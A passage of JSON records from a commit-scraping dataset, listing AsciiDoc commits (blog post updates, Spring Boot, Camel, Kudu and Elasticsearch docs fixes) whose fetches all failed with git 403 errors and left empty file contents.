oot,philwebb\/spring-boot,donhuvy\/spring-boot,mbenson\/spring-boot,kdvolder\/spring-boot,lburgazzoli\/spring-boot,thomasdarimont\/spring-boot,Nowheresly\/spring-boot,bclozel\/spring-boot,akmaharshi\/jenkins,philwebb\/spring-boot,linead\/spring-boot,sbcoba\/spring-boot,cleverj
ava\/jenkins2-course-spring-boot,sebastiankirsch\/spring-boot,dreis2211\/spring-boot,tiarebalbi\/spring-boot,herau\/spring-boot,sbcoba\/spring-boot,mosoft521\/spring-boot,NetoDevel\/spring-boot,linead\/spring-boot,bbrouwer\/spring-boot,donhuvy\/spring-boot,tsachev\/spring-boot,shangyi0102\/spring-boot,bjornlindstrom\/spring-boot,vakninr\/spring-boot,pvorb\/spring-boot,scottfrederick\/spring-boot,jbovet\/spring-boot,shakuzen\/spring-boot,deki\/spring-boot,DeezCashews\/spring-boot,nebhale\/spring-boot,deki\/spring-boot,jvz\/spring-boot,Nowheresly\/spring-boot,olivergierke\/spring-boot,joshthornhill\/spring-boot,spring-projects\/spring-boot,habuma\/spring-boot,akmaharshi\/jenkins,ilayaperumalg\/spring-boot,rweisleder\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,jxblum\/spring-boot,RichardCSantana\/spring-boot,yangdd1205\/spring-boot,deki\/spring-boot,NetoDevel\/spring-boot,drumonii\/spring-boot,olivergierke\/spring-boot,candrews\/spring-boot,afroje-reshma\/spring-boot-sample,yhj630520\/spring-boot,lucassaldanha\/spring-boot,ilayaperumalg\/spring-boot,qerub\/spring-boot,drumonii\/spring-boot,joshthornhill\/spring-boot,rweisleder\/spring-boot,mbenson\/spring-boot,ollie314\/spring-boot,mbogoevici\/spring-boot,bclozel\/spring-boot,bjornlindstrom\/spring-boot,RichardCSantana\/spring-boot,thomasdarimont\/spring-boot,donhuvy\/spring-boot,thomasdarimont\/spring-boot,lucassaldanha\/spring-boot,philwebb\/spring-boot,pvorb\/spring-boot,jayarampradhan\/spring-boot,bbrouwer\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,Buzzardo\/spring-boot,mdeinum\/spring-boot,minmay\/spring-boot,joshiste\/spring-boot,Buzzardo\/spring-boot,ollie314\/spring-boot,NetoDevel\/spring-boot,bijukunjummen\/spring-boot,tiarebalbi\/spring-boot,kamilszymanski\/spring-boot,dreis2211\/spring-boot,deki\/spring-boot,ihoneymon\/spring-boot,shangyi0102\/spring-boot,aahlenst\/spring-boot,vpavic\/spring-boot,javyzheng\/spring-boot,zhanhb\/spring-boot,thomasdarimont\/spring-boot,vakninr\/spring-boot,eddumelendez\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tsachev\/spring-boot,yhj630520\/spring-boot,htynkn\/spring-boot,felipeg48\/spring-boot,javyzheng\/spring-boot,spring-projects\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,pvorb\/spring-boot,ptahchiev\/spring-boot,spring-projects\/spring-boot,kamilszymanski\/spring-boot,rweisleder\/spring-boot,shakuzen\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,bclozel\/spring-boot,scottfrederick\/spring-boot,hqrt\/jenkins2-course-spring-boot,kdvolder\/spring-boot,joshiste\/spring-boot,isopov\/spring-boot,Buzzardo\/spring-boot,chrylis\/spring-boot,i007422\/jenkins2-course-spring-boot,ihoneymon\/spring-boot,qerub\/spring-boot,donhuvy\/spring-boot,vpavic\/spring-boot,royclarkson\/spring-boot,xiaoleiPENG\/my-project,felipeg48\/spring-boot,lburgazzoli\/spring-boot,javyzheng\/spring-boot,royclarkson\/spring-boot,jvz\/spring-boot,brettwooldridge\/spring-boot,donhuvy\/spring-boot,isopov\/spring-boot,mbogoevici\/spring-boot,jayarampradhan\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,drumonii\/spring-boot,zhanhb\/spring-boot,minmay\/spring-boot,bijukunjummen\/spring-boot,i007422\/jenkins2-course-spring-boot,jvz\/spring-boot,sebastiankirsch\/spring-boot,sebastiankirsch\/spring-boot,mbogoevici\/spring-boot,aahlenst\/spring-boot,javyzheng\/spring-boot,scottfrederick\/spring-boot,bbrouwer\/spring-boot,joshiste\/spring-boot,ptahchiev\/spring-boot,philwebb\/spring-boot-concourse,NetoDevel\/spring-boot,vakninr\/
spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,bclozel\/spring-boot,wilkinsona\/spring-boot,ollie314\/spring-boot,zhanhb\/spring-boot,hqrt\/jenkins2-course-spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot-concourse,mbogoevici\/spring-boot,felipeg48\/spring-boot,chrylis\/spring-boot,javyzheng\/spring-boot,vpavic\/spring-boot,zhanhb\/spring-boot,chrylis\/spring-boot,tsachev\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/getting-started.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/getting-started.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2f46d21faeab9e1dae45f0895b4402c0339be338","subject":"fixed typo for apoc.index.addAllNodes","message":"fixed typo for apoc.index.addAllNodes\n","repos":"larusba\/neo4j-apoc-procedures,lilianaziolek\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,larusba\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,inserpio\/neo4j-apoc-procedures,atuljangra\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/inserpio\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"948e3120f2fe33107f0acce16ee9472c85630894","subject":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","message":"Update 2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91c3551ae82f2e7dbeb6630c18c073a5ee191060","subject":"Update 2016-12-06-Vegan-food-in-Leipzig-Weekend-Trip.adoc","message":"Update 2016-12-06-Vegan-food-in-Leipzig-Weekend-Trip.adoc","repos":"zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io,zestyroxy\/zestyroxy.github.io","old_file":"_posts\/2016-12-06-Vegan-food-in-Leipzig-Weekend-Trip.adoc","new_file":"_posts\/2016-12-06-Vegan-food-in-Leipzig-Weekend-Trip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/zestyroxy\/zestyroxy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a50a01b31e7a8ac5aeb14ca7a6ca7f694a4fb33c","subject":"Update 2018-03-19-Docker-Image-Google-Compute-Engine.adoc","message":"Update 
2018-03-19-Docker-Image-Google-Compute-Engine.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-19-Docker-Image-Google-Compute-Engine.adoc","new_file":"_posts\/2018-03-19-Docker-Image-Google-Compute-Engine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"329a8db366d0ec4296f7fc5e15024dc572a49d8b","subject":"Added MIME-Multipart dataformat docs to Gitbook","message":"Added MIME-Multipart dataformat docs to Gitbook\n","repos":"jonmcewen\/camel,zregvart\/camel,yuruki\/camel,veithen\/camel,RohanHart\/camel,sirlatrom\/camel,veithen\/camel,cunningt\/camel,davidkarlsen\/camel,christophd\/camel,kevinearls\/camel,Fabryprog\/camel,dmvolod\/camel,gautric\/camel,ssharma\/camel,ullgren\/camel,adessaigne\/camel,jonmcewen\/camel,bgaudaen\/camel,zregvart\/camel,nboukhed\/camel,salikjan\/camel,mgyongyosi\/camel,JYBESSON\/camel,tadayosi\/camel,curso007\/camel,mcollovati\/camel,onders86\/camel,w4tson\/camel,jonmcewen\/camel,bhaveshdt\/camel,jamesnetherton\/camel,ssharma\/camel,snurmine\/camel,acartapanis\/camel,ullgren\/camel,tdiesler\/camel,objectiser\/camel,cunningt\/camel,adessaigne\/camel,DariusX\/camel,lburgazzoli\/apache-camel,mgyongyosi\/camel,sabre1041\/camel,apache\/camel,pmoerenhout\/camel,sverkera\/camel,nicolaferraro\/camel,hqstevenson\/camel,NickCis\/camel,adessaigne\/camel,lburgazzoli\/camel,tdiesler\/camel,yuruki\/camel,sabre1041\/camel,prashant2402\/camel,pkletsko\/camel,anton-k11\/camel,anoordover\/camel,akhettar\/camel,Thopap\/camel,nikhilvibhav\/camel,veithen\/camel,christophd\/camel,NickCis\/camel,anton-k11\/camel,CodeSmell\/camel,nboukhed\/camel,jamesnetherton\/camel,jarst\/camel,drsquidop\/camel,DariusX\/camel,JYBESSON\/camel,mgyongyosi\/camel,apache\/camel,NickCis\/camel,lburgazzoli\/camel,jarst\/camel,mgyongyosi\/camel,pkletsko\/camel,isavin\/camel,pax95\/camel,kevinearls\/camel,ssharma\/camel,w4tson\/camel,sabre1041\/camel,jarst\/camel,salikjan\/camel,jkorab\/camel,davidkarlsen\/camel,gilfernandes\/camel,Fabryprog\/camel,snurmine\/camel,pkletsko\/camel,prashant2402\/camel,nikhilvibhav\/camel,ssharma\/camel,hqstevenson\/camel,ullgren\/camel,sirlatrom\/camel,driseley\/camel,allancth\/camel,anton-k11\/camel,DariusX\/camel,lburgazzoli\/camel,sabre1041\/camel,dmvolod\/camel,akhettar\/camel,tlehoux\/camel,cunningt\/camel,jonmcewen\/camel,pmoerenhout\/camel,onders86\/camel,RohanHart\/camel,ssharma\/camel,drsquidop\/camel,drsquidop\/camel,scranton\/camel,driseley\/camel,ullgren\/camel,akhettar\/camel,neoramon\/camel,tkopczynski\/camel,jkorab\/camel,w4tson\/camel,neoramon\/camel,christophd\/camel,pmoerenhout\/camel,kevinearls\/camel,gilfernandes\/camel,bgaudaen\/camel,allancth\/camel,jamesnetherton\/camel,tkopczynski\/camel,gilfernandes\/camel,lburgazzoli\/camel,apache\/camel,anoordover\/camel,isavin\/camel,allancth\/camel,gautric\/camel,pax95\/camel,punkhorn\/camel-upstream,pax95\/camel,driseley\/camel,christophd\/camel,acartapanis\/camel,jonmcewen\/camel,mcollovati\/camel,akhettar\/camel,jamesnetherton\/camel,jamesnetherton\/camel,sverkera\/camel,lburgazzoli\/apache-camel,Thopap\/camel,pmoerenhout\/camel,NickCis\/camel,adessaigne\/camel,allancth\/camel,snurmine\/camel,curso007\/camel,acartapanis\/camel,rmarting\/camel,nicolaferraro\/camel,isavin\/c
amel,kevinearls\/camel,tadayosi\/camel,tlehoux\/camel,gilfernandes\/camel,hqstevenson\/camel,tadayosi\/camel,driseley\/camel,bgaudaen\/camel,pmoerenhout\/camel,ssharma\/camel,prashant2402\/camel,dmvolod\/camel,alvinkwekel\/camel,CodeSmell\/camel,cunningt\/camel,neoramon\/camel,akhettar\/camel,chirino\/camel,yuruki\/camel,CodeSmell\/camel,w4tson\/camel,anton-k11\/camel,nboukhed\/camel,sabre1041\/camel,scranton\/camel,cunningt\/camel,drsquidop\/camel,jarst\/camel,onders86\/camel,pax95\/camel,alvinkwekel\/camel,gautric\/camel,chirino\/camel,tkopczynski\/camel,dmvolod\/camel,curso007\/camel,bgaudaen\/camel,mgyongyosi\/camel,hqstevenson\/camel,tdiesler\/camel,scranton\/camel,sirlatrom\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,rmarting\/camel,anoordover\/camel,sirlatrom\/camel,tlehoux\/camel,dmvolod\/camel,yuruki\/camel,jonmcewen\/camel,RohanHart\/camel,punkhorn\/camel-upstream,gilfernandes\/camel,acartapanis\/camel,w4tson\/camel,tkopczynski\/camel,veithen\/camel,rmarting\/camel,bgaudaen\/camel,nikhilvibhav\/camel,scranton\/camel,jkorab\/camel,nikhilvibhav\/camel,lburgazzoli\/camel,prashant2402\/camel,sverkera\/camel,bgaudaen\/camel,rmarting\/camel,gnodet\/camel,allancth\/camel,apache\/camel,Thopap\/camel,punkhorn\/camel-upstream,RohanHart\/camel,rmarting\/camel,bhaveshdt\/camel,neoramon\/camel,neoramon\/camel,onders86\/camel,jkorab\/camel,tlehoux\/camel,kevinearls\/camel,drsquidop\/camel,anoordover\/camel,lburgazzoli\/apache-camel,jkorab\/camel,chirino\/camel,tadayosi\/camel,christophd\/camel,sverkera\/camel,adessaigne\/camel,rmarting\/camel,snurmine\/camel,chirino\/camel,tkopczynski\/camel,JYBESSON\/camel,snurmine\/camel,dmvolod\/camel,anton-k11\/camel,isavin\/camel,lburgazzoli\/apache-camel,jkorab\/camel,zregvart\/camel,Fabryprog\/camel,scranton\/camel,nicolaferraro\/camel,objectiser\/camel,bhaveshdt\/camel,chirino\/camel,prashant2402\/camel,lburgazzoli\/camel,objectiser\/camel,tlehoux\/camel,driseley\/camel,gnodet\/camel,mcollovati\/camel,NickCis\/camel,gilfernandes\/camel,gnodet\/camel,nboukhed\/camel,chirino\/camel,isavin\/camel,objectiser\/camel,allancth\/camel,tadayosi\/camel,davidkarlsen\/camel,tlehoux\/camel,apache\/camel,kevinearls\/camel,anton-k11\/camel,Thopap\/camel,mcollovati\/camel,curso007\/camel,onders86\/camel,bhaveshdt\/camel,apache\/camel,sirlatrom\/camel,snurmine\/camel,Fabryprog\/camel,tdiesler\/camel,scranton\/camel,sverkera\/camel,pkletsko\/camel,yuruki\/camel,punkhorn\/camel-upstream,pax95\/camel,JYBESSON\/camel,pkletsko\/camel,drsquidop\/camel,sverkera\/camel,driseley\/camel,jarst\/camel,RohanHart\/camel,NickCis\/camel,acartapanis\/camel,JYBESSON\/camel,tadayosi\/camel,CodeSmell\/camel,RohanHart\/camel,sabre1041\/camel,jamesnetherton\/camel,davidkarlsen\/camel,DariusX\/camel,isavin\/camel,anoordover\/camel,bhaveshdt\/camel,Thopap\/camel,christophd\/camel,alvinkwekel\/camel,veithen\/camel,prashant2402\/camel,gautric\/camel,gautric\/camel,nboukhed\/camel,veithen\/camel,hqstevenson\/camel,gnodet\/camel,tdiesler\/camel,neoramon\/camel,pkletsko\/camel,curso007\/camel,pmoerenhout\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,nicolaferraro\/camel,hqstevenson\/camel,gnodet\/camel,yuruki\/camel,tdiesler\/camel,bhaveshdt\/camel,mgyongyosi\/camel,Thopap\/camel,gautric\/camel,w4tson\/camel,sirlatrom\/camel,cunningt\/camel,akhettar\/camel,nboukhed\/camel,onders86\/camel,tkopczynski\/camel,JYBESSON\/camel,adessaigne\/camel,jarst\/camel,curso007\/camel,pax95\/camel,zregvart\/camel,anoordover\/camel","old_file":"components\/camel-mail\/src\/main\/docs\/mime-multipart-da
taformat.adoc","new_file":"components\/camel-mail\/src\/main\/docs\/mime-multipart-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"20ffc1e1485c457e56f450eec457e3538a0b4005","subject":"Update 2015-02-24-Referencia-Rapida-Laravel-Artisan.adoc","message":"Update 2015-02-24-Referencia-Rapida-Laravel-Artisan.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-24-Referencia-Rapida-Laravel-Artisan.adoc","new_file":"_posts\/2015-02-24-Referencia-Rapida-Laravel-Artisan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b673ecfe933701b3e3554ad8e6310d8ee9e9c42c","subject":"y2b create post $15 Tea Kettle Vs. $1500 Tea Machine","message":"y2b create post $15 Tea Kettle Vs. $1500 Tea Machine","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-18-15-Tea-Kettle-Vs-1500-Tea-Machine.adoc","new_file":"_posts\/2017-02-18-15-Tea-Kettle-Vs-1500-Tea-Machine.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cc35390619851e39f5616e33aa0837752baffaf","subject":"Update 2015-07-10-Hocus-Pocus-Excerpts-from-Chapter-32.adoc","message":"Update 2015-07-10-Hocus-Pocus-Excerpts-from-Chapter-32.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2015-07-10-Hocus-Pocus-Excerpts-from-Chapter-32.adoc","new_file":"_posts\/2015-07-10-Hocus-Pocus-Excerpts-from-Chapter-32.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33364b318b2f23babd5176715570899a7c63d181","subject":"Update 2015-11-15-Entrar-en-modo-single-user-en-Ubuntu.adoc","message":"Update 2015-11-15-Entrar-en-modo-single-user-en-Ubuntu.adoc","repos":"rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io,rlebron88\/rlebron88.github.io","old_file":"_posts\/2015-11-15-Entrar-en-modo-single-user-en-Ubuntu.adoc","new_file":"_posts\/2015-11-15-Entrar-en-modo-single-user-en-Ubuntu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rlebron88\/rlebron88.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c260a32504e15a196665e6cf087774434fb5bc56","subject":"[docs] Add warning about unsafe-change-config","message":"[docs] Add warning about unsafe-change-config\n\nAdding an explicit warning about unsafe-change-config being unsafe to\navoid users skimming through the docs and deciding this is the command\nthey need.\n\nAlso pointed out that this shouldn't be done if the missing replicas are\na consequence of downed tablet servers and there's a chance of\nrecovering the tablet servers 
themselves.\n\nChange-Id: I266c050c237a5c2fa286208a154c2a80f906769c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9906\nReviewed-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\nTested-by: Will Berkeley <c74686ab413a71926fc1bc9d16ebfa30e619336a@gmail.com>\n","repos":"helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44b0a1d17666e8915a24e08797279aab98a6c26e","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12de8fbace97b5e1c8010dae80d44aa27a5fa9c1","subject":"Update 2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","message":"Update 2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","new_file":"_posts\/2017-06-05-Dieta-mejora-o-reemplazo-Mas-Sano-13.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e5cd93c1d8d52ed8e172b897d819440b22ae6f4","subject":"Prec ex","message":"Prec ex\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Class path\/Exercices.adoc","new_file":"Class path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"764e2a5695c05b2cf0e6a6358e8845c1a3895b21","subject":"Fix broken link reportedby Twitter user","message":"Fix broken link reportedby Twitter 
user\n","repos":"strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test,strapdata\/elassandra-test","old_file":"docs\/reference\/query-dsl\/match-phrase-prefix-query.asciidoc","new_file":"docs\/reference\/query-dsl\/match-phrase-prefix-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77fbe45c9eed31974e8b0a1f0e40562c28184115","subject":"Update 2016-03-25-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","message":"Update 2016-03-25-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","repos":"chackomathew\/blog,chackomathew\/blog,chackomathew\/blog,chackomathew\/blog","old_file":"_posts\/2016-03-25-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","new_file":"_posts\/2016-03-25-First-Blog-Post-Using-Ascii-Doc-in-Hub-Press.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chackomathew\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"264b21ce19abfb88630704a559c2dbab39da1d54","subject":"Create Android.adoc","message":"Create Android.adoc","repos":"Abdennebi\/ProTips","old_file":"Android.adoc","new_file":"Android.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Abdennebi\/ProTips.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"85a7280b602b272e8125b21a3acf8b74a4bc034a","subject":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","message":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a082089a7b9617c6ec13bddd95736e6f13dd1b4e","subject":"Update 2017-07-15-why-we-must-organize.adoc","message":"Update 2017-07-15-why-we-must-organize.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-15-why-we-must-organize.adoc","new_file":"_posts\/2017-07-15-why-we-must-organize.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecc3432d3a106965981fcec6055233f6859b78b6","subject":"Update 2016-12-09-Platinum-sponsor-of-Scala-Days-Berlin.adoc","message":"Update 
2016-12-09-Platinum-sponsor-of-Scala-Days-Berlin.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-12-09-Platinum-sponsor-of-Scala-Days-Berlin.adoc","new_file":"_posts\/2016-12-09-Platinum-sponsor-of-Scala-Days-Berlin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fecc309ec68f839c8362252cf73f58a4153ddec","subject":"Update 2017-01-15-Using-MATLAB-for-hardware-in-the-loop-prototyping.adoc","message":"Update 2017-01-15-Using-MATLAB-for-hardware-in-the-loop-prototyping.adoc","repos":"ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io,ennerf\/ennerf.github.io","old_file":"_posts\/2017-01-15-Using-MATLAB-for-hardware-in-the-loop-prototyping.adoc","new_file":"_posts\/2017-01-15-Using-MATLAB-for-hardware-in-the-loop-prototyping.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ennerf\/ennerf.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b029af8abb33f428d2079ae9fa06052033077de5","subject":"Update 2016-11-22-100300-Tuesday-Morning.adoc","message":"Update 2016-11-22-100300-Tuesday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-22-100300-Tuesday-Morning.adoc","new_file":"_posts\/2016-11-22-100300-Tuesday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de115d7c44eab59857a83fa137af5868932e36da","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"687bdfa11e09d43e843272b4e8c93881f4042e45","subject":"Update 2017-01-06-vultrandlaravel.adoc","message":"Update 2017-01-06-vultrandlaravel.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_file":"_posts\/2017-01-06-vultrandlaravel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cad94b329cdc76430a094178fc4cd57df53488b9","subject":"Publish 1993-11-17.adoc","message":"Publish 
